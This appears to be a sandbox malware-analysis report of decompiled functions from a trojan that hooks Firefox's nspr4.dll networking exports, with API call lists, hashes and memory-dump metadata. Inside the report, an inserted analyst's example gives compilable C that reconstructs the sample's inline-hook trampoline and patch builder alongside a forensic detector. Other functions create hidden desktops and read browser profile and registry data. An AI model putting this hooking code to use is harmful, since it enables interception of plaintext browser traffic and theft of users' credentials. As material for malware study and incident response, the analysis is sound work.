    					_v28 = 0x23;
    					_v16 = _t108;
    					do {
    						_t109 =  *((intOrPtr*)(_t112 + _t101 * 4 - 0x24));
    						__imp__SHGetFolderPathW(0, _t109, 0, 0,  &_v772);
    						if(0 == 0) {
    							_t118 = _t109 - 0x24;
    							if(_t109 == 0x24) {
    								E00413B1C(_t118,  &_v772,  &_v12, 0);
    								_v766 = 0;
    							}
    							_t99 =  &_v24;
    							_t98 =  &_v772;
    							E0041BB58( &_v772,  &_v24, 0, 3, 2, E00413D01,  &_v12, 0, 0, 0);
    						}
    						_t101 = _t101 + 1;
    					} while (_t101 < 4);
    					if(_v8 != 0) {
    						L15:
    						if(_t125 <= 0) {
    							return E00416421(_v12);
    						}
    						_push(0xcb);
    						return E0041252D(_t99, _v12, 0x70);
    					}
    					_t68 = 0x6a;
    					E004159A4(_t68,  &_v180);
    					_t70 = 0x6c;
    					E004159A4(_t70,  &_v64);
    					_t103 =  &_v772;
    					_t75 = E0041A545(0x80000001, _t98, _t103,  &_v180,  &_v64, 0x104);
    					if(_t75 != 0xffffffff) {
    						_t124 = _t75;
    						if(_t75 != 0) {
    							ExpandEnvironmentStringsW(_t103,  &_v1292, 0x104);
    							E00413B1C(_t124,  &_v1292,  &_v12, 1);
    						}
    					}
    					goto L14;
    				}
    			}

    Address range: 0x00413d4a to 0x00413f13

    APIs
      • Part of subcall function 0041A545: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040754A,?,?,00000104,.exe,00000000), ref: 0041A55A
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 00413DB0
      • Part of subcall function 00413B5E: GetPrivateProfileStringW.KERNEL32 ref: 00413B95
      • Part of subcall function 00413B5E: StrStrIW.SHLWAPI(00000001,?), ref: 00413C1D
      • Part of subcall function 00413B5E: StrStrIW.SHLWAPI(00000001,?), ref: 00413C2E
      • Part of subcall function 00413B5E: GetPrivateProfileStringW.KERNEL32 ref: 00413C4A
      • Part of subcall function 00413B5E: GetPrivateProfileStringW.KERNEL32 ref: 00413C68
    • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,00000000,00000001), ref: 00413DCD
      • Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434
    • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 00413E43
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000001), ref: 00413EE0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: PrivateProfileString$EnvironmentExpandPathStrings$FileFolderFreeHeapOpenRemoveSpec
    • String ID: #$$$&
    • API String ID: 1517737059-1941049543
    • Opcode ID: e53d9ea83cd61b8c6056cc9146267e2fa861d4e963f54beda8ed8aa734ca7465
    • Instruction ID: bddb939744c3425734fa5753ee56284869025959f91dd19fffc08ca44088247c
    • Opcode Fuzzy Hash: e53d9ea83cd61b8c6056cc9146267e2fa861d4e963f54beda8ed8aa734ca7465
    • Instruction Fuzzy Hash: A1512CB2E00219AADF10DBA5DC45FEF77BCAB08315F0004A7B518F7181DB78AB858B65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0041AC64(void* __eax, intOrPtr __ecx, void* __edx, void* __eflags, void* _a4, char _a8) {
    				char _v8;
    				DWORD* _v12;
    				intOrPtr _v47;
    				void _v48;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t48;
    				void* _t59;
    				intOrPtr _t62;
    				void* _t64;
    				intOrPtr* _t67;
    				long _t69;
    				DWORD* _t70;
    				void* _t72;
    
    				_t64 = __edx;
    				_t62 = __ecx;
    				_t59 = __eax;
    				_t70 = 0;
    				_v12 = 0;
    				if(E0041AC1F(_a4) < 0x1e) {
    					L18:
    					return _v12;
    				}
    				_t3 =  &_v8; // 0x406353
    				if(VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40, _t3) == 0) {
    					goto L18;
    				}
    				E004164D4( &_v48,  &_v48, 0xffffff90, 0x23);
    				if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
    					L17:
    					_t31 =  &_v8; // 0x406353
    					_t32 =  &_v8; // 0x406353
    					VirtualProtectEx(0xffffffff, _a4, 0x1e,  *_t32, _t31);
    					goto L18;
    				} else {
    					_t67 =  &_v48;
    					_push(0);
    					_push(_t67);
    					while(1) {
    						_t48 = E0041D940(_t59, _t62, _t64, _t67, _t70);
    						if(_t48 == 0xffffffff) {
    							break;
    						}
    						_t70 = _t70 + _t48;
    						if(_t70 > 0x1e) {
    							L16:
    							goto L17;
    						}
    						_t62 =  *_t67;
    						if(_t62 == 0xe9 || _t62 == 0xe8) {
    							if(_t48 == 5) {
    								_t10 =  &_a8; // 0x422020
    								 *((intOrPtr*)(_t67 + 1)) =  *((intOrPtr*)(_t67 + 1)) + _a4 -  *_t10;
    							}
    						}
    						_push(0);
    						if(_t70 >= 5) {
    							_t16 =  &_a8; // 0x422020
    							_t17 = _t70 + 5; // 0x5
    							_t69 = _t17;
    							 *((intOrPtr*)(_t72 + _t70 - 0x2b)) = _a4 -  *_t16 - 5;
    							_t21 =  &_a8; // 0x422020
    							 *((char*)(_t72 + _t70 - 0x2c)) = 0xe9;
    							if(WriteProcessMemory(0xffffffff,  *_t21,  &_v48, _t69, ??) != 0) {
    								_v48 = 0xe9;
    								_v47 = _t59 - _a4 - 5;
    								E004097C8(_a4, _a8);
    								if(WriteProcessMemory(0xffffffff, _a4,  &_v48, 5, 0) != 0) {
    									_v12 = _t69;
    								}
    							}
    							goto L16;
    						}
    						_t67 = _t72 + _t70 - 0x2c;
    						_push(_t67);
    					}
    					goto L16;
    				}
    			}

    Address range: 0x0041ac64 to 0x0041ad80

    APIs
      • Part of subcall function 0041AC1F: VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,00000008,?,?,?,?,00409768,00000000,00000000,00000034,00409AF3,00422020,00000000), ref: 0041AC34
    • VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000040,Sc@,-00000008,00000034,?,?,00409889,?,00000000,?,?,00409AF3,00422020), ref: 0041AC91
    • ReadProcessMemory.KERNEL32(000000FF,00000000,?,0000001E,00000000,?,00000090,00000023,?,?,00409889,?,00000000,?,?,00409AF3), ref: 0041ACB8
    • WriteProcessMemory.KERNEL32(000000FF, B,?,00000005,00000000,?,00000000,00000000,?,?,00409889,?,00000000,?,?,00409AF3), ref: 0041AD32
    • WriteProcessMemory.KERNEL32(000000FF,?,000000E9,00000005,00000000,?,?,00409889,?,00000000,?,?,00409AF3,00422020,00000000,00406353), ref: 0041AD5C
    • VirtualProtectEx.KERNEL32(000000FF,?,0000001E,Sc@,Sc@,?,?,00409889,?,00000000,?,?,00409AF3,00422020,00000000,00406353), ref: 0041AD74
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
    • String ID: B$Sc@
    • API String ID: 390532180-250100105
    • Opcode ID: 0310db3361ac4e395d786e6527b8ef25ca97a18a28826150dd6aaeac143752bf
    • Instruction ID: 90dc8cfd6ff97a8c132ed1c6253f4bbbebe219de32212669c53059d58c3e6a6f
    • Opcode Fuzzy Hash: 0310db3361ac4e395d786e6527b8ef25ca97a18a28826150dd6aaeac143752bf
    • Instruction Fuzzy Hash: 9E317372900218BFDF209FB8DD44EDE7B69AB09730F548317F925A61D0D734D9908BAA
    Uniqueness

    Uniqueness Score: -1.00%
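    Analyst's worked example, added here; it is not part of the sandbox output and not the sample's code. E0041AC64 is the inline-hook installer behind the nspr4.dll hooks: E00409AF5 resolves PR_OpenTCPSocket, PR_Close, PR_Read and PR_Write and hands the table to E0040982D, and the return address 00409889 in the API argument dumps above lies inside that function. Reading the decompilation: the target is checked for 0x1e readable bytes (E0041AC1F, VirtualQueryEx) and made writable with protection 0x40 (PAGE_EXECUTE_READWRITE); a 0x23-byte scratch buffer is filled with 0x90 (the 0xffffff90 passed to E004164D4 is a NOP byte sign-extended); whole instructions are measured with the length decoder E0041D940 until at least five bytes are covered; any five-byte E8/E9 call or jmp among them has its displacement corrected by (target - trampoline); a jmp back to target+len is appended and the result is written to the trampoline buffer _a8; finally E9 with displacement (hook - target - 5) is written over the target and len + 5 is returned. The calls Firefox's networking code makes into PR_Read and PR_Write carry plaintext above the NSS TLS layer, which is why these four exports are the targets. The C below reproduces the byte arithmetic on plain buffers (addresses are integers, nothing is written to a process) and adds the check an incident responder runs over a dumped module: an export that begins with E9 whose resolved destination lies outside the module. The length decoder is a stand-in that knows only a few prologue opcodes; the prologue, addresses and expected bytes are constructed for the example.

```c
/* Added example (editor's reconstruction, not the sample's code): the
 * trampoline/patch arithmetic of the inline hook installer E0041AC64, plus the
 * forensic check that spots such a hook in a dumped module. Addresses are plain
 * 32-bit integers and nothing is written to a process. The length decoder is a
 * stand-in for the sample's E0041D940 and knows only a few prologue opcodes. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HOOK_WINDOW 0x1e          /* bytes the sample reads from the target */
#define JMP_LEN     5             /* E9 rel32 */

typedef struct {
    uint8_t trampoline[HOOK_WINDOW + JMP_LEN]; /* stolen instructions + jmp back */
    size_t  trampoline_len;
    size_t  stolen_len;                        /* bytes overwritten at the target */
    uint8_t patch[JMP_LEN];                    /* "jmp hook" written over the target */
} inline_hook_t;

uint32_t read_le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void write_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Minimal x86-32 instruction length decoder. Assumption: only the opcodes
 * listed here occur in the prologue; anything else returns -1 and aborts. */
static int insn_len(const uint8_t *p, size_t avail) {
    if (avail == 0) return -1;
    uint8_t op = p[0];
    if (op == 0x90 || op == 0xC3 || (op >= 0x50 && op <= 0x5F)) return 1;   /* nop, ret, push/pop r32 */
    if (op == 0x6A) return 2;                                                 /* push imm8 */
    if (op == 0x68 || op == 0xE8 || op == 0xE9) return 5;                     /* push imm32, call/jmp rel32 */
    if ((op == 0x8B || op == 0x89 || op == 0x33 || op == 0x31) && avail >= 2 && (p[1] >> 6) == 3)
        return 2;                                                             /* mov/xor r32,r32 (mod=11) */
    if (op == 0x83 && avail >= 3 && (p[1] >> 6) == 3) return 3;              /* add/sub/cmp r32,imm8 */
    return -1;
}

/* Mirrors E0041AC64: steal whole instructions until >= 5 bytes are covered,
 * relocate any rel32 call/jmp among them by (target - trampoline), append a
 * jmp to target+stolen_len, and prepare the 5-byte "jmp hook" patch.
 * `code` holds the bytes currently at `target`. Returns trampoline length or -1. */
int build_inline_hook(uint32_t target, uint32_t hook, uint32_t trampoline,
                      const uint8_t *code, size_t code_len, inline_hook_t *out)
{
    size_t len = 0;
    if (code_len > HOOK_WINDOW) code_len = HOOK_WINDOW;
    memset(out->trampoline, 0x90, sizeof out->trampoline);   /* NOP fill, like the sample's 0x90 memset */
    while (len < (size_t)JMP_LEN) {
        int n = insn_len(code + len, code_len - len);
        if (n < 0 || len + (size_t)n > code_len) return -1;
        memcpy(out->trampoline + len, code + len, (size_t)n);
        if (n == 5 && (code[len] == 0xE8 || code[len] == 0xE9)) {
            /* rel32 is relative to the instruction, which moved by (trampoline - target) */
            write_le32(out->trampoline + len + 1, read_le32(code + len + 1) + (target - trampoline));
        }
        len += (size_t)n;
    }
    out->stolen_len = len;
    out->trampoline[len] = 0xE9;
    write_le32(out->trampoline + len + 1, target - trampoline - JMP_LEN);  /* back to target+len */
    out->trampoline_len = len + JMP_LEN;
    out->patch[0] = 0xE9;
    write_le32(out->patch + 1, hook - target - JMP_LEN);                    /* target -> hook */
    return (int)out->trampoline_len;
}

/* Forensic check: does the function at `func` start with jmp rel32? If so,
 * resolve the destination; one outside the owning module is the signature of
 * this kind of hook. */
int detect_jmp_hook(uint32_t func, const uint8_t *code, size_t code_len, uint32_t *dest) {
    if (code_len < JMP_LEN || code[0] != 0xE9) return 0;
    *dest = func + JMP_LEN + read_le32(code + 1);   /* uint32 wraparound handles a negative rel32 */
    return 1;
}

int main(void) {
    /* Constructed prologue: push ebp; mov ebp,esp; call +0x10; xor eax,eax; ret */
    static const uint8_t prologue[] = {0x55, 0x8B,0xEC, 0xE8,0x10,0x00,0x00,0x00, 0x33,0xC0, 0xC3};
    inline_hook_t h;
    uint32_t dest;
    int n = build_inline_hook(0x10001000u, 0x00401000u, 0x00330000u, prologue, sizeof prologue, &h);
    printf("trampoline (%d bytes):", n);
    for (int i = 0; i < n; i++) printf(" %02X", h.trampoline[i]);
    printf("\npatch:");
    for (int i = 0; i < JMP_LEN; i++) printf(" %02X", h.patch[i]);
    if (detect_jmp_hook(0x10001000u, h.patch, JMP_LEN, &dest))
        printf("\nhooked: jmp to 0x%08X\n", dest);
    return 0;
}
```

    The relocation step is the part that matters for both sides: a hook that forgets it crashes the browser on the first stolen call, and a responder who sees a call inside a trampoline page whose displacement only makes sense from the original export address has found the evidence that the bytes were lifted from there.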

    C-Code - Quality: 100%
    			E0040C833(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				_Unknown_base(*)()* _t12;
    				struct HINSTANCE__* _t14;
    
    				 *0x422fc8 =  *0x422fc8 & 0x00000000;
    				 *0x422fcc =  *0x422fcc & 0x00000000;
    				_t14 = __eax;
    				InitializeCriticalSection(0x422fac);
    				 *0x422fc4 = _a4;
    				 *0x422fa0 = _a8;
    				 *0x422fd0 = _a12;
    				 *0x422fa4 = _t14;
    				 *0x422f9c = _a16;
    				 *0x422e0c = GetProcAddress(_t14, "PR_GetNameForIdentity");
    				 *0x422fa8 = GetProcAddress( *0x422fa4, "PR_SetError");
    				_t12 = GetProcAddress( *0x422fa4, "PR_GetError");
    				 *0x42293c = _t12;
    				return _t12;
    			}

    Address range: 0x0040c833 to 0x0040c8b1

    APIs
    • InitializeCriticalSection.KERNEL32(00422FAC,74B04EE0,00409B63,00422360), ref: 0040C849
    • GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040C885
    • GetProcAddress.KERNEL32(PR_SetError), ref: 0040C897
    • GetProcAddress.KERNEL32(PR_GetError), ref: 0040C8A9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$CriticalInitializeSection
    • String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
    • API String ID: 2804437462-2578621715
    • Opcode ID: 12880adac82c6ab04e09574cbf302326f1eea9c5a03b9cc43618ca6edcfd8a2f
    • Instruction ID: c920c9481774fa4c86e73df937350f16fb8402cb5207169412b442e858372ce5
    • Opcode Fuzzy Hash: 12880adac82c6ab04e09574cbf302326f1eea9c5a03b9cc43618ca6edcfd8a2f
    • Instruction Fuzzy Hash: 0B019274A00310BFC720DF65EF44A067FF4FB48361B92483AE804A72A1D7B49442EF98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E0041CED0(void* __edx, intOrPtr* _a4) {
    				char _v524;
    				char _v544;
    				char _v556;
    				intOrPtr _v572;
    				char _v924;
    				char _v1028;
    				char _v1040;
    				char _v1060;
    				intOrPtr _v1104;
    				intOrPtr _v1108;
    				intOrPtr _v1112;
    				intOrPtr _v1116;
    				char _v1120;
    				char* _v1124;
    				intOrPtr _v1128;
    				char _v1132;
    				intOrPtr _v1144;
    				signed short _v1146;
    				char _v1148;
    				signed int _v1152;
    				signed int _v1156;
    				char _v1157;
    				signed int _v1160;
    				void* _v1164;
    				void* _v1168;
    				char _v1177;
    				char _v1180;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t59;
    				void* _t62;
    				signed int _t71;
    				char _t77;
    				char* _t85;
    				char _t88;
    				char _t95;
    				short _t100;
    				intOrPtr* _t105;
    				void* _t111;
    				char _t112;
    				signed int _t118;
    				signed int _t119;
    				void* _t123;
    
    				_t111 = __edx;
    				_t105 = _a4;
    				_t59 =  *(_t105 + 4);
    				_push(_t118);
    				_t119 = _t118 | 0xffffffff;
    				_v1152 = _t119;
    				_v1156 = _t119;
    				if(_t59 == _t119 || _t59 == 0xfffffffe) {
    					L4:
    					_t62 = E00416AA0( *((intOrPtr*)( *_t105 + 8)), _t108, 0);
    					_t109 =  *_t105;
    					_t63 = E004194AA(_t62,  *_t105,  *((intOrPtr*)( *_t105 + 4)));
    					_v1160 = _t63;
    					_t133 = _t63 - _t119;
    					if(_t63 == _t119) {
    						goto L20;
    					}
    					E0041981C(_t109, _t63);
    					E004197DA(_v1160);
    					_push(_t105 + 8);
    					_push(3);
    					_push(_v1164);
    					_t123 = 4;
    					if(E0041CAC7(_t109, _t123, _t133) == 0) {
    						goto L20;
    					}
    					_t71 =  *(_t105 + 4);
    					if(_t71 == 0xfffffffe) {
    						SetThreadPriority(GetCurrentThread(), 1);
    						E00406762(0x2937498d,  &_v1028, 0);
    						_t63 = E00405A43(_t109, __eflags,  &_v1040);
    						__eflags = _t63;
    						if(_t63 == 0) {
    							goto L20;
    						}
    						_t77 = E0040809E(_t109, _t111,  &_v924, 1);
    						__eflags = _t77;
    						if(_t77 == 0) {
    							L19:
    							_t63 = E00408309( &_v924, 1);
    							goto L20;
    						} else {
    							__imp__GetShellWindow();
    							__eflags = _t77;
    							_v1157 = _t77 != 0;
    							__eflags = _v1157;
    							if(_v1157 == 0) {
    								E004159A4(0xa8,  &_v1132);
    								_t85 =  &_v524;
    								__imp__SHGetFolderPathW(0, 0x25, 0, 0, _t85);
    								__eflags = _t85;
    								if(_t85 == 0) {
    									_t88 = E0041BCB4( &_v1132,  &_v544,  &_v544);
    									__eflags = _t88;
    									if(_t88 != 0) {
    										_t112 = 0x44;
    										E004164D4( &_v1120,  &_v1120, 0, _t112);
    										_v1124 =  &_v1060;
    										_v1132 = _t112;
    										_t95 = E00417CE8( &_v556, 0, 0,  &_v1132,  &_v1180);
    										__eflags = _t95;
    										if(_t95 != 0) {
    											WaitForSingleObject(_v1168, 0x1388);
    											CloseHandle(_v1164);
    											CloseHandle(_v1168);
    											_v1177 = 1;
    										}
    									}
    								}
    							}
    							SystemParametersInfoW(0x1003, 0, 0, 0);
    							__eflags = _v1157 - 1;
    							if(__eflags == 0) {
    								_v1132 =  &_v924;
    								_v1128 = 0x408513;
    								_v1124 = 0x408516;
    								_v1120 = E00408519;
    								_v1116 = E0040853D;
    								_v1112 = E00408584;
    								_v1108 = E004085B9;
    								_v1104 = 0x408513;
    								E0040AE91(__eflags, _v1156,  &_v1132, _v924, _v572);
    							}
    							goto L19;
    						}
    					} else {
    						if(_t71 == 0xffffffff) {
    							_t63 = E0040E4BF(_v1156, _t109);
    						} else {
    							_push(_v1152);
    							_t63 = E0041961D(_v1156);
    							_t105 = _a4;
    						}
    						goto L20;
    					}
    				} else {
    					_t100 = 2;
    					_v1148 = _t100;
    					_t108 =  *(_t105 + 4) << 8;
    					_v1146 =  *(_t105 + 5) & 0x000000ff |  *(_t105 + 4) << 0x00000008;
    					_v1144 = 0x100007f;
    					_t63 = E00419469( &_v1148);
    					_v1152 = _t63;
    					if(_t63 == _t119) {
    						L20:
    						E004197C4(E004197C4(_t63, _v1156), _v1152);
    						E00416421(_t105);
    						return 0;
    					} else {
    						E0041981C(_t108, _t63);
    						goto L4;
    					}
    				}
    			}

    APIs
      • Part of subcall function 00419469: socket.WS2_32(?,00000001,00000006), ref: 00419472
      • Part of subcall function 00419469: connect.WS2_32(00000000,?,-0000001D), ref: 00419492
      • Part of subcall function 00419469: closesocket.WS2_32(00000000), ref: 0041949D
      • Part of subcall function 0041981C: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 00419832
    • GetCurrentThread.KERNEL32 ref: 0041CFB5
    • SetThreadPriority.KERNEL32(00000000), ref: 0041CFBC
      • Part of subcall function 00405A43: OpenWindowStationW.USER32 ref: 00405A68
      • Part of subcall function 00405A43: CreateWindowStationW.USER32 ref: 00405A7B
      • Part of subcall function 00405A43: GetProcessWindowStation.USER32 ref: 00405A8C
      • Part of subcall function 00405A43: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 00405AC7
      • Part of subcall function 00405A43: CreateDesktopW.USER32 ref: 00405ADB
      • Part of subcall function 00405A43: GetCurrentThreadId.KERNEL32 ref: 00405AE7
      • Part of subcall function 00405A43: GetThreadDesktop.USER32(00000000), ref: 00405AEE
      • Part of subcall function 00405A43: SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 00405B00
      • Part of subcall function 00405A43: CloseDesktop.USER32(00000000,00000000,00000000), ref: 00405B12
      • Part of subcall function 00405A43: CloseWindowStation.USER32(?,?), ref: 00405B2D
      • Part of subcall function 0040809E: TlsAlloc.KERNEL32(00422E10,00000000,0000018C,00000000,00000000), ref: 004080B7
    • GetShellWindow.USER32 ref: 0041D002
    • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?), ref: 0041D035
      • Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3
    • WaitForSingleObject.KERNEL32(00000000,00001388,?,00000000,00000000,?,00000044,?,00000000,00000044,?,?), ref: 0041D097
    • CloseHandle.KERNEL32(?), ref: 0041D0A7
    • CloseHandle.KERNEL32(?), ref: 0041D0AD
    • SystemParametersInfoW.USER32 ref: 0041D0BC
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: DesktopThreadWindow$CloseStation$CreateCurrentHandleOpenPath$AllocCombineFolderInfoObjectParametersPriorityProcessShellSingleSystemWaitclosesocketconnectsetsockoptsocket
    • String ID:
    • API String ID: 1240616959-0
    • Opcode ID: d63e94ef398933a8099d5040c400fb7058f2e99ca655ec4dddcdaceb96e81dee
    • Instruction ID: 007ecb5d2ae6c26e217609dc3fab3f7ca9ff6910374346e168e623f8bc3cf19d
    • Opcode Fuzzy Hash: d63e94ef398933a8099d5040c400fb7058f2e99ca655ec4dddcdaceb96e81dee
    • Instruction Fuzzy Hash: 4261BF71408341AFDB20EF65CD44A9FBBE8AF85718F00492FF594A7291D778C889CB5A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00411B95(void* __ecx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
    				intOrPtr _v16;
    				signed char* _v20;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				char _v76;
    				char _v104;
    				signed int _v116;
    				signed int _v120;
    				signed int _v124;
    				signed int _v125;
    				char _v128;
    				char _v136;
    				intOrPtr _v172;
    				char _v173;
    				signed int _v176;
    				intOrPtr _v180;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed char _t85;
    				signed int _t88;
    				void* _t92;
    				void* _t96;
    				void* _t100;
    				signed int _t107;
    				signed char* _t119;
    				signed int _t120;
    				struct _CRITICAL_SECTION* _t126;
    				char* _t138;
    				char* _t139;
    				char* _t140;
    				signed int _t142;
    				signed int _t148;
    
    				_v120 = _v120 | 0xffffffff;
    				if(E00411A7A( &_v76, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
    					L23:
    					E00410A15( &_v76);
    					return _v120;
    				}
    				_t85 = E004100E7( &_v76);
    				_v120 = _t85;
    				if((1 & _t85) == 0) {
    					__eflags = _t85 & 0x00000002;
    					if((_t85 & 0x00000002) == 0) {
    						_t126 = 0x4230dc;
    						L18:
    						__eflags = _v116 & 0x00000004;
    						if((_v116 & 0x00000004) == 0) {
    							goto L23;
    						}
    						 *_a8 = _v40;
    						 *_a12 = _v36;
    						EnterCriticalSection(_t126);
    						_t146 = _a4;
    						_t88 = E004110FC(_a4);
    						__eflags = _t88 - 0xffffffff;
    						if(_t88 != 0xffffffff) {
    							L21:
    							_t148 = _t88 * 0x24;
    							__eflags = _t148;
    							E00416421( *((intOrPtr*)(_t148 +  *0x4230f4 + 8)));
    							 *((intOrPtr*)(_t148 +  *0x4230f4 + 8)) = _v44;
    							L22:
    							LeaveCriticalSection(_t126);
    							goto L23;
    						}
    						_t88 = E00411122(_t88, _t146);
    						__eflags = _t88 - 0xffffffff;
    						if(_t88 == 0xffffffff) {
    							goto L22;
    						}
    						goto L21;
    					}
    					_v124 = _v124 & 0x00000000;
    					_v125 = 1;
    					__eflags = _v16 - 1;
    					if(_v16 != 1) {
    						L9:
    						_t138 =  &_v104;
    						_t92 = 0x21;
    						E0041596E(_t92, _t138);
    						HttpAddRequestHeadersA(_a4, _t138, 0xffffffff, 0xa0000000);
    						_t139 =  &_v128;
    						_t96 = 0x22;
    						E0041596E(_t96, _t139);
    						HttpAddRequestHeadersA(_a4, _t139, 0xffffffff, 0x80000000);
    						_t140 =  &_v136;
    						_t100 = 0x23;
    						E0041596E(_t100, _t140);
    						HttpAddRequestHeadersA(_a4, _t140, 0xffffffff, 0x80000000);
    						L10:
    						_t126 = 0x4230dc;
    						EnterCriticalSection(0x4230dc);
    						__eflags = _v173;
    						if(_v173 == 0) {
    							L14:
    							E00410A7F(_v64, _v68);
    							__eflags = _v176;
    							if(_v176 != 0) {
    								E004180AE(_v172);
    							}
    							L16:
    							LeaveCriticalSection(_t126);
    							goto L18;
    						}
    						_t150 = _a4;
    						_t107 = E004110FC(_a4);
    						__eflags = _t107 - 0xffffffff;
    						if(_t107 != 0xffffffff) {
    							L13:
    							_t142 = _t107 * 0x24;
    							E00410A7F( *((intOrPtr*)( *0x4230f4 + _t142 + 0x10)),  *((intOrPtr*)( *0x4230f4 + _t142 + 0xc)));
    							E00416421( *(_t142 +  *0x4230f4 + 0x14));
    							 *(_t142 +  *0x4230f4 + 0x14) =  *(_t142 +  *0x4230f4 + 0x14) & 0x00000000;
    							 *(_t142 +  *0x4230f4 + 0x1c) =  *(_t142 +  *0x4230f4 + 0x1c) & 0x00000000;
    							 *(_t142 +  *0x4230f4 + 0x18) =  *(_t142 +  *0x4230f4 + 0x18) | 0xffffffff;
    							 *((intOrPtr*)(_t142 +  *0x4230f4 + 0xc)) = _v76;
    							 *((intOrPtr*)(_t142 +  *0x4230f4 + 0x10)) = _v72;
    							 *((intOrPtr*)(_t142 +  *0x4230f4 + 0x20)) = _v180;
    							goto L16;
    						}
    						_t107 = E00411122(_t107, _t150);
    						__eflags = _t107 - 0xffffffff;
    						if(_t107 == 0xffffffff) {
    							goto L14;
    						}
    						goto L13;
    					}
    					_t119 = _v20;
    					__eflags =  *_t119 & 0x00000003;
    					if(( *_t119 & 0x00000003) == 0) {
    						goto L9;
    					}
    					_t120 = E00410CB9(_t119,  &_v76);
    					_v124 = _t120;
    					__eflags = _t120;
    					if(_t120 != 0) {
    						_v120 = 1;
    					} else {
    						_v125 = _t120;
    					}
    					goto L10;
    				} else {
    					SetLastError(0x2f78);
    					_v120 = _v120 & 0x00000000;
    					goto L23;
    				}
    			}

    APIs
      • Part of subcall function 004100E7: EnterCriticalSection.KERNEL32(004230BC,-00422FC8,00000000,00422FAC), ref: 00410102
      • Part of subcall function 004100E7: LeaveCriticalSection.KERNEL32(004230BC), ref: 00410185
    • SetLastError.KERNEL32(00002F78,?), ref: 00411BDC
    • EnterCriticalSection.KERNEL32(004230DC), ref: 00411C83
    • LeaveCriticalSection.KERNEL32(004230DC,?), ref: 00411D39
    • EnterCriticalSection.KERNEL32(004230DC,?), ref: 00411D60
    • LeaveCriticalSection.KERNEL32(004230DC,?), ref: 00411DA0
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeave$ErrorLast
    • String ID:
    • API String ID: 486337731-0
    • Opcode ID: da1402a21e1fe198c6858913a0838f65cb266c623abc251331a159136cc6fbf1
    • Instruction ID: 496a4979a579abad3ed6fc87abc49ad9faa2688de17775522f92fc069ce05486
